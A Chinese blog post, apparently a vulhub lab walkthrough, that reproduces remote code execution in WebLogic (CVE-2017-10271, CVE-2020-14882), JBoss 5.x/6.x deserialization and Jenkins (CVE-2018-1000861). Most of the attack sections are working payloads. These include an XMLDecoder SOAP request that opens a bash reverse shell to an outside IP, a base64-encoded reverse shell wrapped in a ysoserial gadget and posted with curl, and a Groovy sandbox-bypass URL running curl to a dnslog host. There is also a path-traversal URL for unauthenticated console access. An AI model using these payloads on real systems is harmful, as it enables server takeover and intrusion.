weblogic(CVE-2017-10271、CVE-2020-14882)、Jenkins(CVE-2018-1000861)、JBoss 5.x/6.x 反序列化漏洞

已于 2024-05-11 15:16:27 修改
阅读量438 收藏 7
点赞数 3
分类专栏: vulhub 文章标签: 网络安全
于 2024-05-11 14:33:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/138705413
版权

文章目录

一、weblogic反序列化漏洞(CVE-2017-10271)

简介WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。weblogic是java中间件!
kali开启4444端口:

nc -lnvp 5555

docker部署好环境后,直接访问127.0.0.1:7001,会出现404界面,表示weblogic已成功部署。
在这里插入图片描述

直接发送下面的数据包:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.92.6/5555 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
在这里插入图片描述

二、JBoss 5.x/6.x 反序列化漏洞

jboss是一款java中间件,docker部署成功后,访问127.0.0.1:8080
在这里插入图片描述
编写反弹shell

编码网址:runtime-exec

bash -i >& /dev/tcp/192.168.92.6/4444 0>&1

# 由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,需要用base64进行一次编码。
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

序列化数据生成

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述

curl http://127.0.0.1:8080/invoker/readonly --data-binary @poc.ser
# curl将发送一个POST请求到http://127.0.0.1:8080/invoker/readonly
# --data-binary参数指定了请求体的内容
# @poc.ser表示将文件poc.ser的内容作为请求体发送

在这里插入图片描述

三、Jenkins远程命令执行漏洞(CVE-2018-1000861)

简要介绍Jenkins为是一个Java中间件,它是用Java编写的开源软件,使用Java Servlet容器(例如Tomcat)来运行。

1、工具复现

  1. 查看jenkins版本
curl -s -I http://123.58.224.8:38273<8080端口> | grep X-Jenkins

在这里插入图片描述

  1. 工具验证,该漏洞无回显,可以用dnslog进行外带,exp.py来源于awesome-jenkins-rce-2019
python2 exp.py http://123.58.224.8:38273 'curl cnvxoq.dnslog.cn'

注意python版本为python2.7。

在这里插入图片描述

在这里插入图片描述

2、手动复现

直接访问http://123.58.224.8:13872/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x{public%20x(){new%20String(%22curl%20sp981i.dnslog.cn%22).execute()}}

在这里插入图片描述

在这里插入图片描述

四、weblogic远程代码执行(CVE-2020-14882)

weblogic是一款java中间件~,访问http://123.58.224.8:33640/console说明部署成功

在这里插入图片描述
构造POC未授权访问后台:http://123.58.224.8:33640/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

在这里插入图片描述

PT_silver
关注
专栏目录
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 5181
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
weblogic漏洞复现——CVE-2020-14882
最新发布
weixin_46023655的博客
09-26 330
CVE-2020-14882漏洞复现
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 2150
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
CVE-2017-10271复现
qq_56258713的博客
07-03 3092
CVE-2017-10271复现
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 619
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
weblogicScan+cve-2017-10271.rar
06-27
2017年,WebLogic服务器被发现存在一个严重安全漏洞,即CVE-2017-10271,这个漏洞允许攻击者通过XMLDecoder组件执行任意代码,对目标系统造成重大威胁。 **CVE-2017-10271漏洞详解:** CVE-2017-10271,也被称为...
weblogic_poc.cve-2018-2628.rar_cve-2018-2628_weblogic
09-20
验证是否存在cve-2018-2628漏洞
Weblogic反序列化漏洞CVE-2018-2628)
weixin_46411728的博客
11-15 4091
Weblogic反序列化漏洞CVE-2018-2628)
CVE-2017-10271
weixin_65722679的博客
06-25 390
CVE-2017-10271 【vulhub 漏洞复现】
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 9625
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建
m0_63558213的博客
09-01 1781
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
网络安全---漏洞复现】Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
m0_67844671的博客
09-13 720
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271);​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
jenkins rec 分析 cve-2018-1000861 分析
whatday的专栏
06-02 1111
0x01 Jenkins的动态路由解析 web.xml: 可以看到Jenkins将所有的请求交给org.kohsuke.stapler.Stapler来处理的,跟进看一下这个类中的service方法: 可以看到这里会根据url来调用不同的webApp,如果url以/$stapler/bound/开头,则根节点对象为org.kohsuke.stapler.bind.BoundObjectTable,否则为hudson.model.Hudson(继承jenkins.model.Jenkins
CVE-2020-14882&14883 Weblogic 管理控制台未授权远程命令执行漏洞复现
ierciyuan的博客
07-30 1076
CVE-2020-14882&14883Weblogic管理控制台未授权远程命令执行漏洞复现。提供相关软件包(网盘)
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3240
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值